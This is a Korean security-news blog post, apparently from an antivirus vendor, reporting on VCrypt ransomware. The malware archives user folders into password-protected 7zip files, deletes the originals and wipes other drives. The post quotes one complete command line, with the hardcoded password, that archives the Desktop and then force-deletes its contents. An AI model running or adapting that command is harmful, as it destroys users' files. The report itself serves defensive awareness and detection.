상세 컨텐츠
본문
New VCrypt Ransomware locks files in password-protected 7ZIPs
새로운 랜섬웨어인 VCrypt가 프랑스 피해자들을 노리고 있는 것으로 나타났습니다.
이 랜섬웨어는 합법적인 7zip 명령 프로그램을 통해 데이터 폴더의 패스워드 보호 압축파일을 생성하여 파일을 암호화합니다.
이 새로운 랜섬웨어는 윈도우 폴더에서 발견된 피해자의 파일을 모두 삭제하고, 해당 폴더명을 딴 새로운 암호화된 파일을 생성합니다.
이 암호화된 파일의 이름은 계정명_폴더명.vcrypt와 같은 형태로 생성됩니다.
예를 들어, 아래 이미지와 같이 Documents 폴더 내 파일이 삭제된 후 User_documents.vcrypt 파일이 생성됩니다.
<압축된 폴더>
<이미지 출처: https://www.bleepingcomputer.com/news/security/new-vcrypt-ransomware-locks-files-in-password-protected-7zips/>
랜섬웨어가 시작되면 이 악성코드는 인터넷 익스플로러를 실행하고 help.html이라는 랜섬노트를 표시합니다.
이 랜섬웨어는 프랑스어로 작성되었으며 피해자에게 파일을 돌려받기 위한 방법을 알려주는 웹사이트로 안내합니다.
<VCrypt 랜섬 노트>
<이미지 출처: https://www.bleepingcomputer.com/news/security/new-vcrypt-ransomware-locks-files-in-password-protected-7zips/>
위 내용의 번역본은 아래와 같습니다.
Q: 내 파일은 어떻게 되었나요?
A: 모든 파일이 암호화되어 보호된 영역으로 옮겨졌습니다.
Q: 어떻게 문서를 복구할 수 있나요?
A: 이 웹페이지의 지침을 따르십시오. 페이지가 열리지 않을 경우 인터넷 연결을 확인해 주세요.
이 웹사이트에 접근을 시도했지만 오프라인 상태였기 때문에 얼마나 많은 랜섬머니를 요구했는지는 알 수 없었습니다.
VCrypt, 패스워드로 보호된 7zip 압축파일 생성해
BleepingComputer가 이 랜섬웨어의 샘플을 받아 조사 결과, 이 랜섬웨어는 어떠한 파일도 암호화하지 않는다는 사실을 발견했습니다.
이 랜섬웨어는 실행된 후 자기 자신이 자동으로 시작되도록 설정한 후 합법적인 7zip 명령 프로그램인 7za.exe 파일을 ‘mod_01.exe’로 변경하여 %Temp% 폴더에 추출합니다.
그 후 아래 윈도우 문서 폴더를 패스워드로 보호된 압축파일에 넣는 작업을 시작합니다.
%USERPROFILE%\Desktop
%USERPROFILE%\Downloads
%USERPROFILE%\Pictures
%USERPROFILE%\Music
%USERPROFILE%\Videos
%USERPROFILE%\Documents
%PUBLIC%\Desktop
%PUBLIC%\Downloads
%PUBLIC%\Pictures
%PUBLIC%\Music
%PUBLIC%\Videos
%PUBLIC%\Documents
VCrypt가 생성한 모든 압축파일은 동일한 하드코딩된 패스워드를 사용합니다. 이후 모든 폴더가 삭제됩니다.
아래는 비밀번호가 'Oezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS'로 설정된 압축파일을 생성하고 폴더의 내용을 삭제하는데 사용하는 명령어의 한 예입니다.
if exist "%USERPROFILE%\Desktop\" for /F %i in ('dir /b "%USERPROFILE%\Desktop\*.*"') do "%TEMP%\mod_01.exe" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS "%USERPROFILE%\%username%_desktop.vcrypt" "%USERPROFILE%\Desktop\*" & del /f /s /q "%USERPROFILE%\Desktop\" & FOR /D %p IN ("%USERPROFILE%\Desktop\*") do rmdir "%p" /s /q
컴퓨터 내 드라이브 문자의 경우, 랜섬웨어는 파일을 삭제하기 전에 압축파일을 생성하지 않기 때문에 드라이브 와이퍼(Drive Wiper)의 역할을 합니다.
<다른 드라이브의 데이터 삭제>
<이미지 출처: https://www.bleepingcomputer.com/news/security/new-vcrypt-ransomware-locks-files-in-password-protected-7zips/>
이 랜섬웨어가 어떤 방식으로 배포되는지는 아직까지 밝혀지지 않았습니다.
피해자들은 컴퓨터에 원격 데스크톱을 설정하지 않았으며, 최근 아무것도 다운로드하지 않았다고 밝혔습니다.
현재 알약에서는 해당 악성코드 샘플에 대해 'Trojan.Ransom.vCrypt'으로 탐지 중입니다.
출처:
'국내외 보안동향' 카테고리의 다른 글
| 개인 파일에 대한 접근을 허용할 수 있는 치명적인 Citrix ShareFile 취약점 발견 (0) | 2020.05.07 |
|---|---|
| 대규모 Snake 랜섬웨어 캠페인, 의료 기관 등 노려 (0) | 2020.05.07 |
| 스스로 확산되는 LockBit 랜섬웨어, 시스템 225개 빠르게 감염시켜 (0) | 2020.05.06 |
| 뱅킹 비밀번호, 개인정보 데이터, 키 입력을 훔치는 새로운 안드로이드 악성코드 발견 (0) | 2020.05.04 |
| CVE-2020-1631: Junos OS의 J-Web 및 Web 기반(HTTP/HTTPS) 서비스 취약점 (0) | 2020.05.04 |
댓글 영역